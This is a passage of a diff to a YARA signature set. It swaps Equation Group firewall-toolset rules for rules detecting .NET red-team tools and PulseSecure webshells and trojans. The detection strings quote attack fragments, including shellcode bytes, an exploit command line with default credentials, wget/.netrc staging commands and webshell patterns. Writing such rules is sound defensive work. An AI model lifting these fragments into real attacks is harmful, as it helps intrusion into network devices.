-		hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56"
 
 	strings:
-		$x1 = "This program will configure a JETPLOW Userarea file." fullword ascii
-		$x2 = "Error running config_implant." fullword ascii
-		$x3 = "NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii
-		$x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii
+		$typelibguid0 = "c8112750-972d-4efa-a75b-da9b8a4533c7" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Userscript
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsharefinder : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file userscript.FW"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6c1b70e-437f-50e7-9055-b943a1a62e6c"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L490-L503"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bb485347-ea9b-5f26-99ad-bedc38bfecd5"
+		date = "2023-12-19"
+		modified = "2024-04-24"
+		reference = "https://github.com/mvelazc0/SharpShareFinder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5550-L5562"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "718ee434c8ae61e2709df6dd431dbb0a2230085f0132ae82c7ceda4de75248cf"
+		logic_hash = "72b2c6c9f4da68ba8e9656ff2d9da962f9d791f031c1d7fb74d74ddd17ba49de"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7"
 
 	strings:
-		$x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii
+		$typelibguid0 = "64bfeb18-b65c-4a83-bde0-b54363b09b71" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_BBALL_M50FW08_2201 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Postdump : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L505-L523"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "7f33e76c-0227-5c23-b821-c5c9753e2384"
+		date = "2023-12-19"
+		modified = "2024-04-24"
+		reference = "https://github.com/YOLOP0wn/POSTDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5565-L5577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd180203ec4c4ddfa2c46cba672eb94179553637a9f7548b25dee7b88c3d3294"
+		logic_hash = "e5bbef2fe7122855d7e5300ebf78631149e60b08793a4a21a4ac8b337f4bee60"
 		score = 75
 		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7"
 
 	strings:
-		$s1 = ".got_loader" fullword ascii
-		$s2 = "LOADED" fullword ascii
-		$s3 = "pageTable.c" fullword ascii
-		$s4 = "_start_text" ascii
-		$s5 = "handler_readBIOS" fullword ascii
-		$s6 = "KEEPGOING" fullword ascii
+		$typelibguid0 = "e54195f0-060c-4b24-98f2-ad9fb5351045" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 5 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_BUSURPER_3001_724 : FILE
+rule SIGNATURE_BASE_FE_Webshell_PL_ATRIUM_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "006877e9-1e73-5a27-8b3a-bca3513a2035"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "b2663343-0bae-5215-a443-866ab8626bff"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L525-L540"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L12-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "531f7039290b386f070378cb4ba49a57b5031fb16b3972b61f4fb904770fc4ac"
+		hash = "ca0175d86049fa7c796ea06b413857a3"
+		logic_hash = "869b397616495c644beb997602eac84ddcdbacce4c14755c555f5bda36663ca2"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b"
+		quality = 60
+		tags = ""
 
 	strings:
-		$s1 = "IMPLANT" fullword ascii
-		$s2 = "KEEPGOING" fullword ascii
-		$s3 = "upgrade_implant" fullword ascii
+		$s1 = "CGI::param("
+		$s2 = "system("
+		$s3 = /if[\x09\x20]{0,32}\(CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)\)\s{0,128}\{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\\n\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my \$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)[\x09\x20]{0,32};\s{0,128}system\([\x22\x27]\$/
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_Workit
+rule SIGNATURE_BASE_FE_Trojan_SH_ATRIUM_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file workit.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b582f990-5bd5-592d-a7c0-475fdfffc38c"
-		date = "2016-08-16"
-		modified = "2023-01-27"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L542-L566"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "c49441f4-a138-534c-a858-a7462ed865c9"
+		date = "2021-04-16"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1fa61e8c2012e664fee97ff608bcd8845bbd9701fa02d39d49379f7f83a5636d"
+		hash = "a631b7a8a11e6df3fccb21f4d34dbd8a"
+		logic_hash = "672a293660d89d5d7d62a658c360bad0b6408611d8794744b17a81e6a75ceea7"
 		score = 75
-		quality = 35
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac"
 
 	strings:
-		$s1 = "macdef init > /tmp/.netrc;" fullword ascii
-		$s2 = "/usr/bin/wget http://" ascii
-		$s3 = "HOME=/tmp ftp" fullword ascii
-		$s4 = " >> /tmp/.netrc;" fullword ascii
-		$s5 = "/usr/rapidstream/bin/tftp" fullword ascii
-		$s6 = "created shell_command:" fullword ascii
-		$s7 = "rm -f /tmp/.netrc;" fullword ascii
-		$s8 = "echo quit >> /tmp/.netrc;" fullword ascii
-		$s9 = "echo binary >> /tmp/.netrc;" fullword ascii
-		$s10 = "chmod 600 /tmp/.netrc;" fullword ascii
-		$s11 = "created cli_command:" fullword ascii
+		$s1 = "CGI::param("
+		$s2 = "Cache-Control: no-cache"
+		$s3 = "system("
+		$s4 = /sed -i [^\r\n]{1,128}CGI::param\([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param\([^\r\n]{1,128}system\(/
 
 	condition:
-		6 of them
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_Tinyhttp_Setup : FILE
+rule SIGNATURE_BASE_FE_APT_Webshell_PL_HARDPULSE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "71dcc48f-f551-5596-9f03-dbbae470a62b"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "f9a2922e-6b8e-5f92-a947-3215ee8883ac"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L568-L584"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L46-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d560206e634f3bfeffe5b7de3edf02f6c76443ffb5c0de37180e63276a19457"
+		hash = "980cba9e82faf194edb6f3cc20dc73ff"
+		logic_hash = "37fc40fd998d3294edb05707170bc2deec524fc6451bff212901f9ac3e34bb35"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0"
+		quality = 83
+		tags = ""
 
 	strings:
-		$x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii
-		$x2 = "What is the name of your implant:" fullword ascii
-		$x3 = "killall thttpd" fullword ascii
-		$x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii
+		$r1 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}unless[\x09\x20]{0,32}\(open\(\$\w{1,64},[\x09\x20]{0,32}\$\w{1,64}\)\)\s{0,128}\{\s{1,128}goto[\x09\x20]{1,32}\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}return[\x09\x20]{1,32}0[\x09\x20]{0,32}\x3b\s{0,128}\}/
+		$r2 = /open[\x09\x20]{0,32}\(\*\w{1,64}[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>/
+		$r3 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/
+		$s1 = "CGI::request_method()"
+		$s2 = "CGI::param("
+		$s3 = "syswrite("
+		$s4 = "print $_"
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 2KB and 1 of ( $x* ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_Shellcode
+rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_LOCKPICK_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file shellcode.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d923c1de-c6eb-511f-ae1f-bf3ac6e0eae8"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "00c09378-25a0-55f1-8d93-7b22d98bd8c2"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L586-L605"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L66-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69a04db721a0d17720f9db9386d47309f01d1fc31bd5e833cedb9e1c2eb573ae"
+		hash = "e8bfd3f5a2806104316902bbe1195ee8"
+		logic_hash = "1623c2dc63fe7d595069a024b715bbca267ec1c9400afcadc377ae58afb81a2a"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f"
+		tags = "FILE"
 
 	strings:
-		$s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii
-		$s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii
-		$s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii
-		$c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 }
-		$c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 }
+		$sb1 = { 83 ?? 63 0F 84 [4] 8B 45 ?? 83 ?? 01 89 ?? 24 89 44 24 04 E8 [4] 85 C0 }
+		$sb2 = { 83 [2] 63 74 ?? 89 ?? 24 04 89 ?? 24 E8 [4] 83 [2] 01 85 C0 0F [5] EB 00 8B ?? 04 83 F8 02 7? ?? 83 E8 01 C1 E0 02 83 C0 00 89 44 24 08 8D 83 [4] 89 44 24 04 8B ?? 89 04 24 E8 }
 
 	condition:
-		1 of them
+		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] )
 }
-rule SIGNATURE_BASE_EQGRP_EPBA : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_PACEMAKER : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file EPBA.script"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5159c2f4-20b7-590d-b216-b3468c26e459"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "459e26f1-4ea9-56dd-ad71-0ed2c7499aea"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L607-L626"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L81-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c483efdcfbb0dd8602a552b519d3aa52fca12549c0ec1660d813a2a1da66c3a6"
+		hash = "d7881c4de4d57828f7e1cab15687274b"
+		logic_hash = "f3f89744ce558179f36da3b412ba4afb3798684e6d976ef59de565b5a3323ad6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7"
 
 	strings:
-		$x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii
-		$x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii
-		$x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii
-		$x4 = "--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)" fullword ascii
-		$x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii
-		$x6 = "this operation is complete, BananaGlee will" fullword ascii
-		$x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii
+		$s1 = "\x00/proc/%d/mem\x00"
+		$s2 = "\x00/proc/%s/maps\x00"
+		$s3 = "\x00/proc/%s/cmdline\x00"
+		$sb1 = { C7 44 24 08 10 00 00 00 C7 44 24 04 00 00 00 00 8D 45 E0 89 04 24 E8 [4] 8B 45 F4 83 C0 0B C7 44 24 08 10 00 00 00 89 44 24 04 8D 45 E0 89 04 24 E8 [4] 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] EB }
+		$sb2 = { 8B 95 [4] B8 [4] 8D 8D [4] 89 4C 24 10 8D 8D [4] 89 4C 24 0C 89 54 24 08 89 44 24 04 8D 85 [4] 89 04 24 E8 [4] C7 44 24 08 02 00 00 00 C7 44 24 04 00 00 00 00 8B 45 ?? 89 04 24 E8 [4] 89 45 ?? 8D 85 [4] 89 04 24 E8 [4] 89 44 24 08 8D 85 [4] 89 44 24 04 8B 45 ?? 89 04 24 E8 [4] 8B 45 ?? 89 45 ?? C7 45 ?? 00 00 00 00 [0-16] 83 45 ?? 01 8B 45 ?? 3B 45 0C }
 
 	condition:
-		( uint16( 0 ) == 0x2023 and filesize < 7KB and 1 of ( $x* ) ) or ( 3 of them )
+		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
 }
-rule SIGNATURE_BASE_EQGRP_BPIE : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_Linux_PACEMAKER : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BPIE-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a73f0216-3994-5ee6-8a8c-cbcc1279898e"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "5a20260a-5389-57da-956c-97063fed5015"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L628-L648"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L99-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab13dde40015fba80f55bc9d1b82c94ec2421e9ea263b70ad8ec0a7a74c43c9a"
+		hash = "d7881c4de4d57828f7e1cab15687274b"
+		logic_hash = "cf83024cbbd500a301ac3c859b680cd79acabc232ea6f42c23fe9f8918a8d914"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688"
 
 	strings:
-		$s1 = "profProcessPacket" fullword ascii
-		$s2 = ".got_loader" fullword ascii
-		$s3 = "getTimeSlotCmdHandler" fullword ascii
-		$s4 = "getIpIpCmdHandler" fullword ascii
-		$s5 = "LOADED" fullword ascii
-		$s6 = "profStartScan" fullword ascii
-		$s7 = "tmpData.1" fullword ascii
-		$s8 = "resetCmdHandler" fullword ascii
+		$s1 = "\x00Name:%s || Pwd:%s || AuthNum:%s\x0a\x00"
+		$s2 = "\x00/proc/%d/mem\x00"
+		$s3 = "\x00/proc/%s/maps\x00"
+		$s4 = "\x00/proc/%s/cmdline\x00"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 70KB and 6 of ( $s* ) )
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule SIGNATURE_BASE_EQGRP_Jetplow_SH
+rule SIGNATURE_BASE_FE_APT_Webshell_PL_PULSECHECK_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file jetplow.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e7780540-29c9-5827-8ac0-a685d9ba8a5f"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "f375fdd8-567b-569b-85f4-af54a35d2a93"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L650-L666"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L116-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ae203527c4e41ae169c63521bb08d5199c43dfd1028574a1791ab1f8f198105"
+		hash = "a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1"
+		logic_hash = "aba457dd33232ef37ca145c5b7cd9c5fe809730339a55c5e90ac46b4a136f6cb"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c"
 
 	strings:
-		$s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii
-		$s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii
-		$s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii
-		$s4 = "*****             Welcome to JetPlow              *****" fullword ascii
+		$r1 = /while[\x09\x20]{0,32}\(<\w{1,64}>\)[\x09\x20]{0,32}\{\s{1,256}\$\w{1,64}[\x09\x20]{0,32}\.=[\x09\x20]{0,32}\$_;\s{0,256}\}/
+		$s1 = "use Crypt::RC4;"
+		$s2 = "use MIME::Base64"
+		$s3 = "MIME::Base64::decode("
+		$s4 = "popen("
+		$s5 = " .= $_;"
+		$s6 = "print MIME::Base64::encode(RC4("
+		$s7 = "HTTP_X_"
 
 	condition:
-		1 of them
+		$s1 and $s2 and ( @s3 [ 1 ] < @s4 [ 1 ] ) and ( @s4 [ 1 ] < @s5 [ 1 ] ) and ( @s5 [ 1 ] < @s6 [ 1 ] ) and ( #s7 > 2 ) and $r1
 }
-rule SIGNATURE_BASE_EQGRP_BBANJO : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_PULSEJUMP_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BBANJO-3011.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "81af4769-7007-51f1-9569-bc370618b4ff"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "690cc347-e60f-5cac-b65d-367ecee69251"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L668-L687"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L137-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ee2e817732674bf7ff5f396271a2a90da8f401d7ea0f0a3f51c21712adb3ea4"
+		hash = "91ee23ee24e100ba4a943bb4c15adb4c"
+		logic_hash = "c9aa2b9ef8aff14c20ed6597b1a71eafc3e3c181aabf9a3a68df18945207ff86"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = "get_lsl_interfaces" fullword ascii
-		$s2 = "encryptFC4Payload" fullword ascii
-		$s3 = ".got_loader" fullword ascii
-		$s4 = "beacon_getconfig" fullword ascii
-		$s5 = "LOADED" fullword ascii
-		$s6 = "FormBeaconPacket" fullword ascii
-		$s7 = "beacon_reconfigure" fullword ascii
+		$s1 = "open("
+		$s2 = ">>/tmp/"
+		$s3 = "syswrite("
+		$s4 = /\}[\x09\x20]{0,32}elsif[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27](Radius|Samba|AD)[\x22\x27][\x09\x20]{0,32}\)\s{0,128}\{\s{0,128}@\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}&/
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_EQGRP_BPATROL_2201 : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_QUIETPULSE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BPATROL-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "864a346c-e8aa-5c66-9867-faccb14b8bee"
-		date = "2016-08-16"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "4c49eef7-b8fa-55d5-8fb8-8964f6f50003"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L689-L706"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L154-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2e9aa4627924c99dd3a342174855df3f0d545a67fd2293ca5601eeae70ae010"
+		hash = "00575bec8d74e221ff6248228c509a16"
+		logic_hash = "226a56369e141834d4834400bbf1a006bbb6e9b39e16e24b0106bff1a9c202a9"
 		score = 75
 		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395"
+		tags = ""
 
 	strings:
-		$s1 = "dumpConfig" fullword ascii
-		$s2 = "getstatusHandler" fullword ascii
